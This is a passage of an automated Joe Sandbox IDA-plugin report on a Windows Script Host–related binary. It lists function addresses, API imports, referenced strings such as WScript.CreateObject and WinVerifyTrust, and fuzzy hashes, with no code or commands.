Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Library$Free$DefaultLanguageLoadVersion$FindInfoLocalePathResourceSearchSystemUser_wcsncoll
String ID: %s\%s$MUI
API String ID: 4051804633-2651373239
Opcode ID: 8ba841149439af4d1bddf59d917fa73db4130d6cf2da4477b3a80215aec19422
Instruction ID: 41d05dc2575b6a504823e2baaa4f35f4d1c0253750894362f010b438f43d30b2
Opcode Fuzzy Hash: 8ba841149439af4d1bddf59d917fa73db4130d6cf2da4477b3a80215aec19422
Instruction Fuzzy Hash: F7D17051B1C68692EA66EE559C10AB9D291EF04FE4F840432FD4F97B88DF3CF51582A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA1C9C, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 181COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00007FF7C0BA1CFD
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA1D2A
GetLastError.KERNEL32 ref: 00007FF7C0BA1D37

Strings

ScriptFile, xrefs: 00007FF7C0BA1CE7, 00007FF7C0BA1DB6, 00007FF7C0BA1E12
Path, xrefs: 00007FF7C0BA1CF6, 00007FF7C0BA1E41, 00007FF7C0BA1E9D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharErrorLastMultiPrivateProfileStringWide
String ID: Path$ScriptFile
API String ID: 3760252266-3888212790
Opcode ID: 5f9a9f18898cb667536f3997294d2a5b0bf70923a7b9e8a82c859b85847d0031
Instruction ID: e44a07ac657479a38d8c16f71d50374ad6d9703badbb08dee368d8e4e3d31055
Opcode Fuzzy Hash: 5f9a9f18898cb667536f3997294d2a5b0bf70923a7b9e8a82c859b85847d0031
Instruction Fuzzy Hash: 4971E432608B8182D761EF21AC405AAF3A5FB44BB4F844235EADE97B94CF3CE164C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B96954, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 137memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969BB
GetLastError.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969C9
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96A01
SysAllocString.OLEAUT32 ref: 00007FF7C0B96B05
LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B27
LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B36

Strings

WSHRemote.Execute, xrefs: 00007FF7C0B96958

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeLocal$AllocByteCharErrorFormatLastMessageMultiStringWide
String ID: WSHRemote.Execute
API String ID: 1576816494-1341764647
Opcode ID: ffd1c503382e88e5e3f823932d5f50387db5542b11f5a48d8d5ae937d63ab8a6
Instruction ID: f5395b538c1fb80079f779f807bf0b63a06a1b113fc1595a1f487bc08e02a478
Opcode Fuzzy Hash: ffd1c503382e88e5e3f823932d5f50387db5542b11f5a48d8d5ae937d63ab8a6
Instruction Fuzzy Hash: 1D519632708B8286E724DF25AC4026AB7E5FB447B4B444639EA9F87F98DF3CE0508750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA1F68, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00007FF7C0BA1FBB
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA1FE8
GetLastError.KERNEL32 ref: 00007FF7C0BA1FF5

Strings

Options, xrefs: 00007FF7C0BA1FB1, 00007FF7C0BA2074, 00007FF7C0BA20D0

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharErrorLastMultiPrivateProfileWide
String ID: Options
API String ID: 1820523601-529056539
Opcode ID: aafc30660be3989b7c677a723431278c8b586d3f44f073ea2de56a761cd41acf
Instruction ID: e431051476c382332d726903f51ef08369ccb861a38ea046e8873fd3d47e9a6b
Opcode Fuzzy Hash: aafc30660be3989b7c677a723431278c8b586d3f44f073ea2de56a761cd41acf
Instruction Fuzzy Hash: 9751A432608B8182D725EF21AC4056AB395FB45BB4B844335EEAE97BD4DF3CE065C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9D4A0, Relevance: 15.1, APIs: 10, Instructions: 89fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF7C0B9D4D9
GetLastError.KERNEL32 ref: 00007FF7C0B9D4E8
FindFirstFileW.KERNEL32 ref: 00007FF7C0B9D501
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0B9D52E
GetLastError.KERNEL32 ref: 00007FF7C0B9D53B
FindClose.KERNEL32 ref: 00007FF7C0B9D5DA

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
String ID:
API String ID: 443336949-0
Opcode ID: 028f28adc3d604a2775b557c643c268d49e15f65d77c04e2609fd8a3dfd66380
Instruction ID: 073b8deb09d3114fc9ccfad9c6b788fc329d758d0d8a2a1a9af86e3bf9bf1f90
Opcode Fuzzy Hash: 028f28adc3d604a2775b557c643c268d49e15f65d77c04e2609fd8a3dfd66380
Instruction Fuzzy Hash: E241A021A08A8285EB65EF21AC443B9A6A0FB55779FC40335D66FCABD4CF3CF5158360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA0A94, Relevance: 10.6, APIs: 7, Instructions: 108COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0AD5
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0AE3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0B1A

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharErrorFullLastMultiNamePathWide
String ID:
API String ID: 1285381999-0
Opcode ID: 804bdb2c6a16e6dbf445d7e938d7e4f358934b16472f3108d679ff835b2cda5a
Instruction ID: de121b104641af766b0b12b4e14a49c03b79dc146403076ec2594615b65baf9b
Opcode Fuzzy Hash: 804bdb2c6a16e6dbf445d7e938d7e4f358934b16472f3108d679ff835b2cda5a
Instruction Fuzzy Hash: 2B419332A08B8186E721DF21AC4056AB6A5FB447B4F944335EA5A87BD4DF3CE5618350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA2D74, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FindResourceExW.KERNEL32(?,?,00000000,00007FF7C0BA30D6), ref: 00007FF7C0BA2DAC
LoadResource.KERNEL32(?,?,00000000,00007FF7C0BA30D6), ref: 00007FF7C0BA2DC1
FindResourceExW.KERNEL32(?,?,00000000,00007FF7C0BA30D6), ref: 00007FF7C0BA2DDA
LoadResource.KERNEL32(?,?,00000000,00007FF7C0BA30D6), ref: 00007FF7C0BA2DEF
SetLastError.KERNEL32(?,?,00000000,00007FF7C0BA30D6), ref: 00007FF7C0BA2E2E

Strings

MUI, xrefs: 00007FF7C0BA2D9E, 00007FF7C0BA2DCD

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Resource$FindLoad$ErrorLast
String ID: MUI
API String ID: 4223540915-1339004836
Opcode ID: ee440cfde5a40ed86de3bdb70f8ca0b02737172c3f366c1fdf687691d9491939
Instruction ID: e12a46a4e3532ce83c0f3fc681c757db86811963c397f8dbcad495515be6e38b
Opcode Fuzzy Hash: ee440cfde5a40ed86de3bdb70f8ca0b02737172c3f366c1fdf687691d9491939
Instruction Fuzzy Hash: 95218D21B09A4241FFA7EF19ED1413592A1AF48BA4F945435CB0F87B54DF3CF8668360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA3BF0, Relevance: 9.0, APIs: 6, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C21
GetCurrentProcessId.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C2F
GetCurrentThreadId.KERNEL32 ref: 00007FF7C0BA3C3B
GetTickCount.KERNEL32 ref: 00007FF7C0BA3C47
GetTickCount.KERNEL32 ref: 00007FF7C0BA3C57
QueryPerformanceCounter.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C72

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: d5f154a875e1f0608891e15b4576a9b2a311f5baa3c67677897c00686b334d0e
Instruction ID: 2a98de3cec2367c38729e4f7283c6fcc1e8a46f5a766ce2f6ac32200fc257a20
Opcode Fuzzy Hash: d5f154a875e1f0608891e15b4576a9b2a311f5baa3c67677897c00686b334d0e
Instruction Fuzzy Hash: 5F112121A05F428ADB01EF71EC450A973A4FB49768B801A35EA6E83B54EF3CE5758390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B991AC, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 378COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7C0B9928D

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

CreateBindCtx.OLE32 ref: 00007FF7C0B9962A

Strings

WScript, xrefs: 00007FF7C0B995B3
WSH, xrefs: 00007FF7C0B995DB

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: BindCreateDefaultUser_malloc_dbg
String ID: WSH$WScript
API String ID: 2109471750-1019903269
Opcode ID: 7cdb09a521cc4e122bc585dc87989b5881d3b94ddf221384a86a570e6912439e
Instruction ID: 6c9f0074255225f7b7269c73512244d1e84550d0d7e56f67e88623ba7cf382d7
Opcode Fuzzy Hash: 7cdb09a521cc4e122bc585dc87989b5881d3b94ddf221384a86a570e6912439e
Instruction Fuzzy Hash: 0F023D26B08B5686EB55DF69D890169B370FB48F94B844036CE0E87B64DF3DE465C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9C370, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

WScript.CreateObject, xrefs: 00007FF7C0B9C3E9, 00007FF7C0B9C68F

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID:
String ID: WScript.CreateObject
API String ID: 0-1366894974
Opcode ID: 008792f5e162dc5d3a9b384b9b4e046247bced2e29afe3130450b502360bdb38
Instruction ID: 407234e1a60b6ffe1b494079d41c1c9639948886a6d52c9a711de4231b39d4c7
Opcode Fuzzy Hash: 008792f5e162dc5d3a9b384b9b4e046247bced2e29afe3130450b502360bdb38
Instruction Fuzzy Hash: 47A15A66718A8681EA15EF1AD890279A370FB84FA4F945032EE0F87764DF3CF455C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B94FE0, Relevance: 4.6, APIs: 3, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

CreateBindCtx.OLE32 ref: 00007FF7C0B95021
SysAllocStringByteLen.OLEAUT32 ref: 00007FF7C0B950BF
SysFreeString.OLEAUT32 ref: 00007FF7C0B9510D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$AllocBindByteCreateFree
String ID:
API String ID: 3716443497-0
Opcode ID: af0a492460ef6d514494ad7fdd4927a935bcce2d0a4bdd5fb251437fca3461da
Instruction ID: 986bd6e85cff8f1351d0a3e66c912621c26e8835035851df463e64064c121b44
Opcode Fuzzy Hash: af0a492460ef6d514494ad7fdd4927a935bcce2d0a4bdd5fb251437fca3461da
Instruction Fuzzy Hash: B9414032B44A1686EB15DF66D8503AD63B0EB48FA9F404036CE0E97B54DF7DE456C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B93C18, Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 287registrystringCOMMON

Download Yara Rule

APIs

LoadRegTypeLib.OLEAUT32 ref: 00007FF7C0B93CA5
RegOpenKeyA.ADVAPI32 ref: 00007FF7C0B93CEB

Part of subcall function 00007FF7C0B931F4: _vsnprintf.MSVCRT ref: 00007FF7C0B93231

SysFreeString.OLEAUT32 ref: 00007FF7C0B93E0F
SysStringLen.OLEAUT32 ref: 00007FF7C0B93EA4
sprintf_s.MSVCRT ref: 00007FF7C0B93ED3
RegOpenKeyA.ADVAPI32 ref: 00007FF7C0B93EE7
RegQueryValueA.ADVAPI32 ref: 00007FF7C0B93F12
strcmp.MSVCRT ref: 00007FF7C0B93F23
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93F3C
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93F4E
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93F60
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93F72
RegCloseKey.ADVAPI32 ref: 00007FF7C0B93F7D
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93F8C
RegOpenKeyA.ADVAPI32 ref: 00007FF7C0B93F9C
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93FB1
RegCloseKey.ADVAPI32 ref: 00007FF7C0B93FBB
RegDeleteKeyA.ADVAPI32 ref: 00007FF7C0B93FC7
RegCloseKey.ADVAPI32 ref: 00007FF7C0B93FCF
UnRegisterTypeLib.OLEAUT32 ref: 00007FF7C0B93FF5
RegCloseKey.ADVAPI32 ref: 00007FF7C0B94099
SysFreeString.OLEAUT32 ref: 00007FF7C0B940A4

Strings

CLSID, xrefs: 00007FF7C0B93CE4, 00007FF7C0B93FAA
, xrefs: 00007FF7C0B93F03
ProgID, xrefs: 00007FF7C0B93F6B
Version, xrefs: 00007FF7C0B93F0B, 00007FF7C0B93F59
TypeLib, xrefs: 00007FF7C0B93F47
LocalServer32, xrefs: 00007FF7C0B93F35
1.0, xrefs: 00007FF7C0B93F18

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Delete$Close$OpenString$FreeType$LoadQueryRegisterValue_vsnprintfsprintf_sstrcmp
String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
API String ID: 2408362525-1178591435
Opcode ID: 1a7804dd676ee839003af73902d4650a243e9882f2b3694fbbe909cdd1bccacf
Instruction ID: 331a3c181e6e61f3c0e6d8a4794be51818874551c4f0a4dbb2a113f3c959efb0
Opcode Fuzzy Hash: 1a7804dd676ee839003af73902d4650a243e9882f2b3694fbbe909cdd1bccacf
Instruction Fuzzy Hash: 87E12036B08B4682EB01EF65DC94169A3B1FB84FA4F904032DA4E87B68DF7DE455C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B967CC, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 107memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96816
LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96829
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96838
swprintf_s.MSVCRT ref: 00007FF7C0B96863
FormatMessageA.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96877
LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96888
sprintf_s.MSVCRT ref: 00007FF7C0B968A6
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B968C3
LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B968DC
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96903
SysAllocString.OLEAUT32 ref: 00007FF7C0B96915
LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96927
LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96936

Strings

0x%8X, xrefs: 00007FF7C0B9689A
0x%8X, xrefs: 00007FF7C0B96854

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
String ID: 0x%8X$0x%8X
API String ID: 1583499379-4147741067
Opcode ID: c5a85885311cf4042d3cf8e089c4a7487ab9d558c7754ad68e0d695b610d4354
Instruction ID: 57eadbc855561dd243636b2156e87bc12b31fc50bd982c89a85689aeb341702e
Opcode Fuzzy Hash: c5a85885311cf4042d3cf8e089c4a7487ab9d558c7754ad68e0d695b610d4354
Instruction Fuzzy Hash: 2A419232B09B1286E715EF21AC44579A7A5FF48BA4B84413ADD4F83B54DF3CF4568390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B980EC, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 157libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0B97E44: GetSystemDirectoryA.KERNEL32 ref: 00007FF7C0B97E67
Part of subcall function 00007FF7C0B97E44: GetLastError.KERNEL32 ref: 00007FF7C0B97E73

GetProcAddress.KERNEL32 ref: 00007FF7C0B98180
GetLastError.KERNEL32 ref: 00007FF7C0B9818E
GetProcAddress.KERNEL32 ref: 00007FF7C0B981B3
GetProcAddress.KERNEL32 ref: 00007FF7C0B981CD
wcsrchr.MSVCRT ref: 00007FF7C0B981E8
memset.MSVCRT ref: 00007FF7C0B98222
memset.MSVCRT ref: 00007FF7C0B98265
CloseHandle.KERNEL32 ref: 00007FF7C0B9830B
FreeLibrary.KERNEL32 ref: 00007FF7C0B9831E

Strings

WinVerifyTrust, xrefs: 00007FF7C0B98179
, xrefs: 00007FF7C0B98282
WintrustSetRegPolicyFlags, xrefs: 00007FF7C0B981C6
wintrust.dll, xrefs: 00007FF7C0B98133
WintrustGetRegPolicyFlags, xrefs: 00007FF7C0B981AC

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: AddressProc$ErrorLastmemset$CloseDirectoryFreeHandleLibrarySystemwcsrchr
String ID: $WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
API String ID: 1667831668-3174228240
Opcode ID: f44232b6c4acef3f1758b81b054faaf4af62f7febe82bdf01971c056996aea97
Instruction ID: 934a55041fc7ccf3a91e1642f80210dee8b3108571d05fe861322f970146c87a
Opcode Fuzzy Hash: f44232b6c4acef3f1758b81b054faaf4af62f7febe82bdf01971c056996aea97
Instruction Fuzzy Hash: 70614B32A18B5286E701EF65E88026EB7B0FB84764F904035EE4B97B58DF3CE455CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9C8A0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF7C0B9C910
VariantClear.OLEAUT32 ref: 00007FF7C0B9C91A
SafeArrayGetElement.OLEAUT32 ref: 00007FF7C0B9C92B
SysAllocString.OLEAUT32 ref: 00007FF7C0B9C94A
VariantClear.OLEAUT32 ref: 00007FF7C0B9C966
VariantClear.OLEAUT32 ref: 00007FF7C0B9C970
GetProcessHeap.KERNEL32 ref: 00007FF7C0B9C97B
HeapFree.KERNEL32 ref: 00007FF7C0B9C989
VariantChangeType.OLEAUT32 ref: 00007FF7C0B9C9B7

Strings

null, xrefs: 00007FF7C0B9C93E

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Variant$Clear$Heap$AllocArrayChangeElementFreeProcessSafeStringType
String ID: null
API String ID: 915209209-634125391
Opcode ID: 98e48d5cb1498143d75f1ca6c8df7f96c020fd9b64a28909cffdce2a388d37b5
Instruction ID: 14d775712410ca8502e7c0f01d088b454fac31339723f722bd0ba6910dd268ee
Opcode Fuzzy Hash: 98e48d5cb1498143d75f1ca6c8df7f96c020fd9b64a28909cffdce2a388d37b5
Instruction Fuzzy Hash: 85516D22B14A5286EB12EF65DC545A967B0FF44BB8F800435DE0E97B98EF38F455C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B93268, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159registrywindowthreadCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00007FF7C0B93329
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00007FF7C0B93338
